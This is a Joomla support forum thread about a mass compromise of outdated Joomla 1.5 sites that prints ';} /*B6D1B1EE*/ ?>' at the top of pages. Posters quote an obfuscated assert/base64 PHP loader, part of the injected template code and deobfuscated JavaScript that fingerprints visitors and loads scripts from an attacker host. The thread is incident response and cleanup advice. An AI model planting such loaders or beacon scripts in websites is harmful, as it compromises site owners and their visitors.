";} /*B6D1B1EE*/ ?> at top of site
Moderator: General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
";} /*B6D1B1EE*/ ?> at top of site
Hi there, today I noticed I have the text ";} /*B6D1B1EE*/ ?> right at the top of my site, I have googled this and it seems a lot of joomla 1.5 sites have this, but there is no discussion about it.
You can see the other sites in search results:
https://www.google.co.uk/#q=%22%3B%7D+% ... %2F+%3F%3E
I'd like to get rid of it and also know what it is, and help gratefully received!
Thanks
Terry
You can see the other sites in search results:
https://www.google.co.uk/#q=%22%3B%7D+% ... %2F+%3F%3E
I'd like to get rid of it and also know what it is, and help gratefully received!
Thanks
Terry
- dhuelsmann
- Joomla! Master
- Posts: 19659
- Joined: Sun Oct 02, 2005 12:50 am
- Location: Omaha, NE
- Contact:
Re: ";} /*B6D1B1EE*/ ?> at top of site
Since the 1.5.x series reached end of life in September 2012, my first guess is that your site has been hacked along with all the others you found.
Regards, Dave
Past Treasurer Open Source Matters, Inc.
Past Global Moderator
http://www.kiwaniswest.org
Past Treasurer Open Source Matters, Inc.
Past Global Moderator
http://www.kiwaniswest.org
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
I have found it in my template index file, but can;t see any suspicious code near it, odd
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
Yeah I am unsure, I found the text in my templates index file, in this code:dhuelsmann wrote:Since the 1.5.x series reached end of life in September 2012, my first guess is that your site has been hacked along with all the others you found.
require(YOURBASEPATH . DS . "rt_head_includes.php");
?>
";} /*B6D1B1EE*/ ?>
<?php /*d0eeaa88*/ if(is_object($_SESSION["__default"]["user"]) && !($_SESSION["__default"]["user"]->id)) {echo "
I can't see anything there that looks really suspicious however, can anyone else?
Thanks again
- dhuelsmann
- Joomla! Master
- Posts: 19659
- Joined: Sun Oct 02, 2005 12:50 am
- Location: Omaha, NE
- Contact:
Re: ";} /*B6D1B1EE*/ ?> at top of site
Use the site malware scanner at https://sitecheck.sucuri.net/
Regards, Dave
Past Treasurer Open Source Matters, Inc.
Past Global Moderator
http://www.kiwaniswest.org
Past Treasurer Open Source Matters, Inc.
Past Global Moderator
http://www.kiwaniswest.org
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
Thanks for that, no malware found, but an alert to my outdated version of Joomla
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: ";} /*B6D1B1EE*/ ?> at top of site
no malware found doesn't mean you weren't hacked. you could have been spam link defaced.
i searched that sequence and found that on every site i checked, they were running out of date joomla AND running mod_stats with a variation of statsr57.php or similar n
eg should be no where near the media directory
i searched that sequence and found that on every site i checked, they were running out of date joomla AND running mod_stats with a variation of statsr57.php or similar n
eg
Code: Select all
/media/stat522.php >
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
Thanks mandville, what would be your course of action? I will try and get the Joomla updated but in the mean time, I am unsure what to do.
I have removed the ";} /*B6D1B1EE*/ ?> from the index.php file and all seems OK, although I know that is just a work around
I have removed the ";} /*B6D1B1EE*/ ?> from the index.php file and all seems OK, although I know that is just a work around
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: ";} /*B6D1B1EE*/ ?> at top of site
i edited my post but you should really be looking for the r57 shell file. hints seem to point to php files in the media directory
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
Thanks, there are no php files in the root of media, and the only text I see in the code near the issue is:mandville wrote:i edited my post but you should really be looking for the r57 shell file. hints seem to point to php files in the media directory
src=/modules/mod_stats/statd0e.php
That doesn't look right to me - I am not a programmer but will look at that file now
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
OK that file contains this:
<?php
$udinrg="\x61"."\x73"."\x73"."\x65".chr(114).chr(116);
$blmjnrcdi=chr(98)."a"."s"."e"."\x36"."\x34".chr(95)."d"."\x65".chr(99)."o"."\x64"."e";
@$udinrg(
@$blmjnrcdi(
'='));
## ###############################################################################
<?php
$udinrg="\x61"."\x73"."\x73"."\x65".chr(114).chr(116);
$blmjnrcdi=chr(98)."a"."s"."e"."\x36"."\x34".chr(95)."d"."\x65".chr(99)."o"."\x64"."e";
@$udinrg(
@$blmjnrcdi(
'='));
## ###############################################################################
Last edited by mandville on Mon Aug 29, 2016 7:04 pm, edited 1 time in total.
Reason: Redacted hack code
Reason: Redacted hack code
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: ";} /*B6D1B1EE*/ ?> at top of site
i redacted the code just in case. you should run and post the fpa so we can see what else is going on. or you could just follow the hacked site sticky and rebuild using the latest secure version
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
Hi there, I have run the FAP, would you like me to PM you the url top it or paste any info here?mandville wrote:i redacted the code just in case. you should run and post the fpa so we can see what else is going on. or you could just follow the hacked site sticky and rebuild using the latest secure version
Thanks for the help so far, it really is appreciated.
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: ";} /*B6D1B1EE*/ ?> at top of site
please post as per instructions
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
Forum Post Assistant (v1.2.7) : 29th August 2016 wrote:Basic Environment :: wrote:Joomla! Instance :: Joomla! 1.5.26-Stable (senu takaa ama busani) 27-March-2012
Joomla! Configured :: Yes | Read-Only (444) | Owner: user_1075945597 (uid: 1/gid: 1) | Group: root (gid: 1) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: No | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: -1 | Site Debug: 0 | Language Debug: 0 | Database Credentials Present: Yes
Host Configuration :: OS: Linux | OS Version: 2.6.18-410.el5.centos.plus | Technology: x86_64 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: /home/linweb32/t/mywebsiteaddress-1075945598/user/htdocs | System TMP Writable: Yes
PHP Configuration :: Version: 5.2.17 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: | Error Reporting: 6143 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 20M | Max. POST Size: 20M | Max. Input Time: 60 | Max. Execution Time: 60 | Memory Limit: 64M
MySQL Configuration :: Version: 5.0.95-log (Client:5.1.50) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 62.57 MiB | #of Tables: 697Detailed Environment :: wrote:PHP Extensions :: date (5.2.17) | libxml () | openssl () | pcre () | zlib (1.1) | bz2 () | calendar () | ctype () | curl () | hash (1.0) | filter (0.11.0) | ftp () | gettext () | gmp () | session () | iconv () | pcntl () | posix () | readline () | Reflection (0.1) | standard (5.2.17) | shmop () | SimpleXML (0.1) | SPL (0.2) | sockets () | exif (1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $) | sysvmsg () | sysvsem () | sysvshm () | tokenizer (0.1) | wddx () | xml () | cgi-fcgi () | bcmath () | dbase () | dom (20031129) | gd () | imap () | json (1.2.1) | mbstring () | mcrypt () | mysql (1.0) | mysqli (0.1) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_pgsql (1.0.2) | pdo_sqlite (1.0.1) | pgsql () | soap () | xmlreader (0.1) | xmlrpc (0.51) | xmlwriter (0.1) | xsl (0.1) | zip (1.8.11) | ionCube Loader () | Zend Optimizer () | Zend Engine (2.2.0) |
Potential Missing Extensions :: suhosin |
Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: No | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: NoFolder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |
Elevated Permissions (First 10) :: podcast/ (707) |Extensions Discovered :: wrote:Components :: SITE :: Default (1.0.0) | User (1.5.0) | Wrapper (1.5.0) | MailTo (1.5.0) |
Components :: ADMIN :: Trash (1.0.0) | Language Manager (1.5.0) | Mass Mail (1.5.0) | Cache Manager (1.5.0) | PhocaGallery (2.8.1) | Akeeba (3.4.3) | RokCandy (0.87a) | Content Page (1.5.0) | AceSEF (1.5.20) | Mail To (1.5.1) | User (1.5.1) | Polls (1.5.0) | Wrapper (1.5.0) | AceSEF (1.5.1) | Banners (1.5.2) | Search (1.5.1) | Web Links (1.5.1) | Content (1.5.12) | Contact (1.5.3) | News Feeds (1.5.1) | Configuration Manager (1.5.0) | RokQuickCart (1.1) | Module Manager (1.5.0) | AcyMailing Tag : insert Virtue (1.2.1) | AcyMailing : share on social n (1.0.0) | AcyMailing Editor (beta) (4.7.2) | AcyMailing Manage text (1.0.0) | AcyMailing : Handle Click trac (3.0.0) | AcyMailing Tag : JomSocial Use (3.0.0) | AcyMailing Module (3.7.0) | AcyMailing Tag : Subscriber in (4.7.2) | AcyMailing Tag : Date / Time (4.7.2) | AcyMailing : Statistics Plugin (3.7.0) | AcyMailing Tag : Manage the Su (4.7.2) | AcyMailing Template Class Repl (4.7.2) | AcyMailing : trigger Joomla Co (3.7.0) | AcyMailing Tag : CB User infor (3.7.0) | AcyMailing Tag : VirtueMart pe (3.0.0) | AcyMailing table of contents g (1.0.0) | AcyMailing : (auto)Subscribe d (4.7.2) | AcyMailing Tag : Insert a Modu (3.0.0) | AcyMailing Tag : content inser (3.7.0) | AcyMailing Tag : Joomla User I (4.7.2) | AcyMailing Tag : Website links (3.7.0) | AcyMailing (4.7.2) | Contact Items (1.0.0) | Control Panel (1.5.0) | Frontpage (1.5.0) | Media Manager (1.5.0) | Weblinks (1.5.0) | Newsfeeds (1.5.0) | RokNavMenu Bundle (1.7.5) | CK Forms (1.3.5) | Template Manager (1.5.0) | Xmap (1.2.14) | JEvents Plugin (1.0.3) | lknAnswers Plugin (1.5.0) | DOCman Plugin (1.5.0) | Rokdownloads Plugin (1.0.4) | Kunena Plugin (1.0.2) | Agora Plugin (1.0.0) | JoomGallery Plugin (1.5.1) | Hot Property Plugin (1.0.1) | JMovies Plugin (1.5.0) | KnowledgeBase Plugin (1.0.0) | RD-Autos Plugin (1.5.0) | Mosets Tree Plugin (1.0.1) | MyBlog Plugin (1.5.1) | Remository Plugin (1.0.3) | JCALPro Plugin (1.0.0) | SectionEx Plugin (1.0.2) | Yoflash XMap Plugin (0.0.1) | AcyMailing Plugin (1.0.0) | Eventlist Plugin (1.0.0) | JoomSuite Resources Plugin (1.0.0) | Zoo Plugin (1.0.4) | CMS Shop Builder Plugin (1.5.0) | JoomDOC Extension (1.0.0) | SOBI2 Plugin (1.5.1) | Rapid Recipe Plugin (1.0.0) | Virtuemart Plugin (1.1.4) | Web Links Plugin (1.5.1) | Content Plugin (1.5.1) | RSGallery2 Extension (1.0.0) | JDownloads Plugin (1.5.1) | Gallery2 Bridge Plugin (1.0.2) | Contacts Plugin (1.0.1) | Jomres Plugin (1.0) | Glossary Plugin (1.5.2) | Banners (1.5.0) | Menus Manager (1.5.0) | User Manager (1.5.0) | Polls (1.5.0) | Error404 (2.7) | Installation Manager (1.5.0) | JCalPro (2.1.0 (build_) | Search (1.5.0) | RokModule (1.1) | Messaging (1.5.0) | Plugin Manager (1.5.0) |
Modules :: SITE :: Most Read Content (1.5.0) | Footer (1.5.0) | Countdown (0.0. | RokTabs (1.5) | RokStories (@VERSION@) | RokNavMenu (1.7.5) | ARI Image Slider (2.1.4) | JCal Pro Mini-calendar (2.1.0 (build_) | Share (1.0.0) | Feed Display (1.5.0) | Banner (1.5.0) | JS FlexSlider (1.1) | AcyMailing Module (3.7.0) | RokContentRotator (1.5) | ITPFacebookLikeBox (1.2) | Phoca Gallery Image Module (2.7.5) | RokMicroNews (1.1) | CKforms Form Display (1.3.4) | Login (1.5.0) | Breadcrumbs (1.5.0) | RokNewsPager (@VERSION@) | Search (1.0.0) | RokAjaxSearch (1.2) | Udjamaflip's Sociable Module b (1.5.0) | ValAddThis (2.5.2) | Variation Chooser (1.0.0) | Newsflash (1.5.0) | JCal Pro Latest Events (2.1.0 (build_) | Sections (1.5.0) | Who\'s Online (1.0.0) | Google Driving Directions (1.1) | Archived Content (1.5.0) | Random Image (1.5.0) | Poll (1.5.0) | Related Items (1.0.0) | Statistics (1.5.0) | mod_btslideshow (1.1.0) | ITPSocialButtons (1.5) | Custom HTML (1.5.0) | Follow Me (1.5.7) | ITPShare (1. | Latest News (1.5.0) | Syndicate (1.5.0) | Phoca Facebook Comments (1.0.7) | RokTwittie (0.1) | AlphaTwitter (1.0.2) | Menu (1.5.0) | Wrapper (1.0.0) | Rapid Contact (1.1) |
Modules :: ADMIN :: Quick Icons (1.0.0) | Footer (1.0.0) | Logged in Users (1.0.0) | Latest News (1.0.0) | AceSEF - Quick Icons (1.5.0) | Feed Display (1.5.0) | Admin Menu (1.0.0) | Login Form (1.0.0) | Unread Items (1.0.0) | Akeeba Backup Notification Mod (3.4.3) | User Status (1.5.0) | Items Stats (1.0.0) | Custom HTML (1.5.0) | Title (1.0.0) | Popular Items (1.0.0) | Toolbar (1.0.0) | Online Users (1.0.0) | Admin Submenu (1.0.0) |
Plugins :: SITE :: System - SEF (1.5) | System - Legacy (1.5) | Akeeba Backup Lazy Scheduling (3.3) | System - Log (1.5) | System - AceSEF Meta Manager ( (1.5.0) | System - RokGZipper (1.5) | System - Debug (1.5) | AcyMailing : (auto)Subscribe d (4.7.2) | System - Backlinks (1.5) | Google Maps (2.14) | System - RokCandy (0.87a) | System - AceSEF (1.5.0) | System - Remember Me (1.5) | System - RokBox (2.0) | System - Cache (1.5) | System - Canonicalization (-) | System - Mootools Upgrade (1.5) | Search - Weblinks (1.5) | Search - Sections (1.5) | Search - Categories (1.5) | Search - Contacts (1.5) | JCal Pro Search plugin (2.1.0 (build_) | Search - Content (1.5) | Search - Newsfeeds (1.5) | User - Example (1.0) | User - Joomla! (1.5) | Content - Load Modules (1.5) | ValAddThis (1.5.4) | Content - Perfect Link with Ar (2.0.12PRO) | Content - Slimbox (1.0) | Content - Example (1.0) | Content - CKforms Data Display (1.3.4) | JCalPro Latest Events plugin (2.1.0 (build_) | Phoca Gallery Plugin (2.7.7) | Content - Page Navigation (1.5) | Content - pPGallery (4.313) | Content - CKforms Form Display (1.3.4) | Content - Pagebreak (1.5) | Content - Vote (1.5) | Content - Email Cloaking (1.5) | Content - RokBox (1.4) | Simple Image Gallery (by Jooml (2.2) | Content - Code Highlighter (Ge (1.5) | load module into article (1.1.0) | AcyMailing Tag : insert Virtue (1.2.1) | AcyMailing Manage text (1.0.0) | AcyMailing : Statistics Plugin (3.7.0) | AcyMailing Tag : Manage the Su (4.7.2) | AcyMailing Tag : Date / Time (4.7.2) | AcyMailing Tag : JomSocial Use (3.0.0) | AcyMailing Tag : Website links (3.7.0) | AcyMailing Template Class Repl (4.7.2) | AcyMailing : share on social n (1.0.0) | AcyMailing table of contents g (1.0.0) | AcyMailing : Handle Click trac (3.0.0) | AcyMailing Tag : Joomla User I (4.7.2) | AcyMailing Tag : Insert a Modu (3.0.0) | AcyMailing Tag : VirtueMart pe (3.0.0) | AcyMailing Tag : Subscriber in (4.7.2) | AcyMailing Tag : CB User infor (3.7.0) | AcyMailing : trigger Joomla Co (3.7.0) | AcyMailing Tag : content inser (3.7.0) | Authentication - Example (1.5) | Authentication - LDAP (1.5) | Authentication - GMail (1.5) | Authentication - OpenID (1.5) | Authentication - Joomla (1.5) | Editor - RokPad (0.7) | AcyMailing Editor (beta) (4.7.2) | Editor - TinyMCE 3 (3.2.6) | Editor - XStandard Lite for Jo (1.0) | XML-RPC - Joomla API (1.0) | XML-RPC - Blogger API (1.0) | Button - RokCandy (0.87a) | Button - Image (1.0.0) | Button - Pagebreak (1.5) | Button - Readmore (1.5) | RokNavMenu - Boost (1.7.5) | RokNavMenu - Extended Link (1.7.5) |Templates Discovered :: wrote:Templates :: SITE :: beez (1.0.0) | jTemplate (1.0.3) | rt_iridium_j15 (1.5.0) | rhuk_milkyway (1.0.2) | JA_Purity (1.2.0) |
Templates :: ADMIN :: Khepri (1.0) |
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: ";} /*B6D1B1EE*/ ?> at top of site
summary
extensions out of date
folder podcast incorrect permission no related extension
php version out of date
etc
extensions out of date
folder podcast incorrect permission no related extension
php version out of date
etc
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Fledgling
- Posts: 4
- Joined: Tue Aug 30, 2016 2:30 pm
Re: ";} /*B6D1B1EE*/ ?> at top of site
Sites I maintain were also hit by this in the past 48 hours. This was embedded into every template, where XXX is a random 3 characters:
http://pastebin.com/redacted
The code that resides in the statXXX.php file unwraps to assert(base64decode(eval(base64decode(*stuff*)))) Then with a bit of cleanup and some deobfuscation (the comments are a part of the exploit code) we get:
http://pastebin.com/redacted
This is downloading from hxxp://redacted.net/id4.php the following:
http://pastebin.com/redacted
which then downloads this from hxxp://redacted.net/id4.php?id=4 :
http://pastebin.com/redacted
Which is just sending the timezone as UTC offset and screen resolution. It seems like whoever is executing this large scale attack doesn't really know what they are doing. Nothing harmful is actually occurring, it's super obvious when a site has been affected, and the code doesn't even work as expected. I'm still looking in to how this was embedded into the templates though.
http://pastebin.com/redacted
The code that resides in the statXXX.php file unwraps to assert(base64decode(eval(base64decode(*stuff*)))) Then with a bit of cleanup and some deobfuscation (the comments are a part of the exploit code) we get:
http://pastebin.com/redacted
This is downloading from hxxp://redacted.net/id4.php the following:
http://pastebin.com/redacted
which then downloads this from hxxp://redacted.net/id4.php?id=4 :
http://pastebin.com/redacted
Which is just sending the timezone as UTC offset and screen resolution. It seems like whoever is executing this large scale attack doesn't really know what they are doing. Nothing harmful is actually occurring, it's super obvious when a site has been affected, and the code doesn't even work as expected. I'm still looking in to how this was embedded into the templates though.
Last edited by mandville on Tue Aug 30, 2016 4:34 pm, edited 1 time in total.
Reason: redacted link - do not link to hacking scripts
Reason: redacted link - do not link to hacking scripts
-
- Joomla! Fledgling
- Posts: 4
- Joined: Tue Aug 30, 2016 2:30 pm
Re: ";} /*B6D1B1EE*/ ?> at top of site
Seeing as a mod gutted my previous post of all useful information, and I can't edit it, this should hopefully avoid "linking to hacking scripts" despite the fact that anything I linked to was the result of being hacked, not a script to hack a Joomla site in the first place. This is a potentially huge issue in the works and there needs to be some place to discuss it, seeing as this thread is the first 3 google results for "B6D1B1EE" this thread should provide the info required to diagnose and resolve this breach. 36 hours ago this affected 36,000 sites, 6 hours ago it affected 89,000 sites, now it is affecting 118,000 sites. While this intrusion itself isn't successfully doing anything, whatever entry point it is using is still there.
If your site is showing "B6D1B1EE" in the header you need to search every template for this code and remove it:
This is not a "hacking script," this is what every infected template needs have to removed from it, not making this information easily available is harmful to anyone who is forced to still maintain a Joomla 1.5 site
http://pastebin.com/CaP85wrM
You then need to remove the statXXX.php file that has been placed into your /modules/mod_stat/ directory. The script also places 2 files in your /tmp directory, but they are just used for storing timestamps, but feel free to empty that directory as well (it is just temporary after all).
The code that resides in the statXXX.php file unwraps to assert(base64decode(eval(base64decode(*stuff*)))) Then with a bit of cleanup and some deobfuscation we get some code that over complicates downloading a simple javascript file and attempting to embed it in the header of every page view. The code also leave dangling connections which results in the server;s memory being clogged more and more after every page view, restarting apache seemed to fix that.
The malicious code is downloading from hxxp://censored.net/id4.php the following:
This is not a "hacking script," it is a simple javascript include
which then downloads this from hxxp://censored.net/id4.php?id=4 :
This is not a "hacking script," it is simple javascript for getting the timezone and screen size
Which is just sending the timezone as UTC offset and screen resolution. It seems like whoever is executing this large scale attack doesn't really know what they are doing. Nothing harmful is actually occurring, it's super obvious when a site has been affected, and the code doesn't even work as expected. I've tried every UTC offset and every common desktop/tablet/phone resolution and in every attempt it just returns the exact same script, which if the exploit code was actually working as intended would loop infinitely.
If your site is showing "B6D1B1EE" in the header you need to search every template for this code and remove it:
This is not a "hacking script," this is what every infected template needs have to removed from it, not making this information easily available is harmful to anyone who is forced to still maintain a Joomla 1.5 site
http://pastebin.com/CaP85wrM
You then need to remove the statXXX.php file that has been placed into your /modules/mod_stat/ directory. The script also places 2 files in your /tmp directory, but they are just used for storing timestamps, but feel free to empty that directory as well (it is just temporary after all).
The code that resides in the statXXX.php file unwraps to assert(base64decode(eval(base64decode(*stuff*)))) Then with a bit of cleanup and some deobfuscation we get some code that over complicates downloading a simple javascript file and attempting to embed it in the header of every page view. The code also leave dangling connections which results in the server;s memory being clogged more and more after every page view, restarting apache seemed to fix that.
The malicious code is downloading from hxxp://censored.net/id4.php the following:
This is not a "hacking script," it is a simple javascript include
Code: Select all
var script = document.getElementById("scriptData"); //createElement("script");
script.src="http://censored.net/js/analytic.php?id=4";
//document.head.appendChild(script);
This is not a "hacking script," it is simple javascript for getting the timezone and screen size
Code: Select all
<!--
function tzSignature() {
var tz;
try {
var currDate = new Date();
var currTime = currDate.toString();
tz = currDate.getTimezoneOffset();
if ( (currTime.indexOf("PDT") > 0) ||
(currTime.indexOf("MDT") > 0) ||
(currTime.indexOf("CDT") > 0) ||
(currTime.indexOf("EDT") > 0) ||
(currTime.indexOf("Daylight") > 0) )
tz += 60;
tz = - tz / 60;
} catch (e) {
tz = "";
}
return tz;
}
function rsSignature() {
var rs;
try {
var rsWidth = screen.width;
var rsHeight = screen.height;
var rs = rsWidth + "x" + rsHeight;
} catch (e) {
rs = "";
}
return rs;
}
var script = document.createElement("script");
script.src="http://censored.net//js/analytic.php?id=4&tz="+tzSignature()+'&rs='+rsSignature();
document.head.appendChild(script);
//document.write('<sc'+'ript type="text/javascript" src="http://censored.net//js/analytic.php?id=4&tz='+tzSig$
//-->
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: ";} /*B6D1B1EE*/ ?> at top of site
not sure why people are "forced " to still be running a 1.5 site. perhaps he same people who are using samsung s2, iphone5, htc wildfire, windows xp or leaded petrol etc [analogy]
as you state we dont allow links to any code that can be used for illegal means.
as stated in previous posts. out of date joomla, possibly out of date php, possibly out of date extensions.
what do you have in common with the OP beyond using 1.5 ?
https://docs.joomla.org/Security_Checkl ... or_defaced is where you should be heading next
as you state we dont allow links to any code that can be used for illegal means.
as stated in previous posts. out of date joomla, possibly out of date php, possibly out of date extensions.
what do you have in common with the OP beyond using 1.5 ?
https://docs.joomla.org/Security_Checkl ... or_defaced is where you should be heading next
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Fledgling
- Posts: 4
- Joined: Tue Aug 30, 2016 2:30 pm
Re: ";} /*B6D1B1EE*/ ?> at top of site
Several clients of the company I work for are small pro-bono/non-profit clients that have zero budget to pay us to update their sites, sites which were established in the mid 2000's. If it were up to me they wouldn't still be on 1.5.26
All server software is up to date, this is an exploit that exists in Joomla 1.5.26. The modifications to the templates, /modules/mod_stat/statXXX.php file, and 2 files in the /tmp directory are the only changes this intrusion has made. Since my last post the number of results on google for "B6D1B1EE" has grown by another 4000.
All server software is up to date, this is an exploit that exists in Joomla 1.5.26. The modifications to the templates, /modules/mod_stat/statXXX.php file, and 2 files in the /tmp directory are the only changes this intrusion has made. Since my last post the number of results on google for "B6D1B1EE" has grown by another 4000.
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: ";} /*B6D1B1EE*/ ?> at top of site
are the sites you have on 1.5 with the 1.5.26+ patch (or what ever people called it) tht was issued after EOL http://joomlacode.org/gf/project/joomla ... m_id=31626
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
- ozneilau
- Joomla! Guru
- Posts: 872
- Joined: Tue Aug 04, 2009 9:05 am
- Location: Tasmania, Australia
- Contact:
Re: ";} /*B6D1B1EE*/ ?> at top of site
There are 2 x security hotfixes for Joomla 1.5.26, the Session Hardening patch and the File Upload Security patch which can be found at: https://docs.joomla.org/Security_hotfix ... L_versionsmandville wrote:are the sites you have on 1.5 with the 1.5.26+ patch (or what ever people called it) that was issued after EOL
-
- Joomla! Fledgling
- Posts: 3
- Joined: Wed Aug 31, 2016 11:02 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
Hello all,
Im pretty new to Joomla having been told to fix this issue this morning (pretty stressed).
I actually have the ;} /*B6D1B1EE*/ ?> issue as well as someone POST'ing to Joomla to send spam.
As of this momment, Ive deleted Joomla and turned the DB off.
Am I still vulnerable to the exploit?
I can see IP's trying to POST to /libraries/phpxmlrpc/compat/article48.php ...obviously failing because Joomla is no longer there.
cheers in advance
Im pretty new to Joomla having been told to fix this issue this morning (pretty stressed).
I actually have the ;} /*B6D1B1EE*/ ?> issue as well as someone POST'ing to Joomla to send spam.
As of this momment, Ive deleted Joomla and turned the DB off.
Am I still vulnerable to the exploit?
I can see IP's trying to POST to /libraries/phpxmlrpc/compat/article48.php ...obviously failing because Joomla is no longer there.
cheers in advance
-
- Joomla! Fledgling
- Posts: 3
- Joined: Wed Aug 31, 2016 11:02 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
Actually when I say "Am I still vulnerable to the exploit?" .... I mean what else should I be afraid of?
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
Thanks for all this!MiscCoder wrote:Seeing as a mod gutted my previous post of all useful information, and I can't edit it, this should hopefully avoid "linking to hacking scripts" despite the fact that anything...
I have removed the statd0e.php file, I had nothing in my temp folder, but from what you say this is a pretty badly written nasty, so no surprises there I guess.
I've checked everything else out and made another backup just in case.
Again, thank you.
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
I agree with this, and this is my situation too.MiscCoder wrote:Several clients of the company I work for are small pro-bono/non-profit clients that have zero budget to pay us to update their sites, sites which were established in the mid 2000's. If it were up to me they wouldn't still be on 1.5.26
All server software is up to date, this is an exploit that exists in Joomla 1.5.26. The modifications to the templates, /modules/mod_stat/statXXX.php file, and 2 files in the /tmp directory are the only changes this intrusion has made. Since my last post the number of results on google for "B6D1B1EE" has grown by another 4000.
The simple fact is there are a lot of people on 1.5 who don't have the budget to upgrade.
I will however push them to do so after this, hopefully they listen.
- fcoulter
- Joomla! Ace
- Posts: 1685
- Joined: Thu Sep 13, 2007 11:39 am
- Location: UK
- Contact:
Re: ";} /*B6D1B1EE*/ ?> at top of site
